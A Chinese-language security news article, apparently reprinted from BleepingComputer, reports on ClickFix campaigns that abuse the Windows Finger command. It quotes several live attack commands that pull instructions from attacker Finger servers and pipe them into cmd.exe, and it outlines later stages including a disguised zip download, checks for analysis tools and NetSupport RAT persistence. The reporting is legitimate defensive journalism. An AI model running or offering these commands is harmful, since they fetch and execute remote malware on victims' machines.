駭客濫用數十年前的 Finger 協定發動 ClickFix 攻擊

數十年歷史的 Finger 指令最近在資安威脅中捲土重來，攻擊者利用此協定在 Windows 裝置上遠端執行惡意命令。

Finger 指令過去用於查詢 Unix 與 Linux 系統上的使用者資訊，後來也被加入 Windows 系統。執行後會回傳使用者的登入名稱、姓名、主目錄、電話號碼、最後登入時間等基本資訊。儘管仍受支援，但與數十年前的普及程度相比，現今已很少被使用。

近期出現多起利用 Finger 協定的惡意攻擊活動，攻擊者透過遠端伺服器取得惡意指令並在受害裝置上執行。早在 2020 年，研究人員就已警告駭客將 Finger 指令當作 Living Off the Land Binary（LOLBIN）來下載惡意軟體並規避偵測。

攻擊手法解析

10 月，資安研究人員 MalwareHunterTeam 分享了一個批次檔案樣本。該檔案執行後會使用「finger root@finger.nateams[.]com」指令從遠端 Finger 伺服器取得命令，再透過 cmd.exe 在本地執行。

Reddit 上有使用者發文警告遭遇類似攻擊。駭客偽裝成 Captcha 驗證頁面，誘騙受害者執行 Windows 指令來「證明自己是真人」。受害者在命令提示字元中輸入了以下指令：「cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are humanpress ENTER'」。

這種攻擊利用 Finger 協定作為遠端腳本傳遞機制。執行 finger 指令後，輸出內容會被導向 Windows 命令處理器 cmd.exe。取得的命令會執行以下動作：建立隨機命名的路徑、將 curl.exe 複製為隨機檔名、使用重新命名的 curl 下載偽裝成 PDF 的 zip 壓縮檔、解壓縮出 Python 惡意軟體套件。接著使用「pythonw.exe init.py」執行 Python 程式。最後回傳確認訊息給攻擊者伺服器，同時向使用者顯示假的「驗證你是真人」提示。

研究人員發現另一個進化版攻擊，使用「finger Kove2@api.metrics-strange.com | cmd」取得並執行類似指令。此版本會先檢查受害系統是否存在惡意軟體分析工具，包括 filemon、regmon、procexp、Wireshark、Fiddler、IDA、x64dbg、OllyDbg、ProcessHacker 等。若未偵測到這些工具，就會下載偽裝成 PDF 的 zip 檔案並解壓縮。不過這次解出的不是 Python 套件，而是 NetSupport Manager 遠端存取木馬（RAT）。攻擊者會設定排程工作，讓惡意軟體在使用者登入時自動啟動。

目前這類 Finger 協定濫用攻擊似乎出自單一駭客發動的 ClickFix 攻擊活動。對防禦者而言，最有效的阻擋方式是封鎖 TCP port 79 的對外流量，因為這是 Finger 協定 daemon 使用的連線埠。

本文轉載自 BleepingComputer。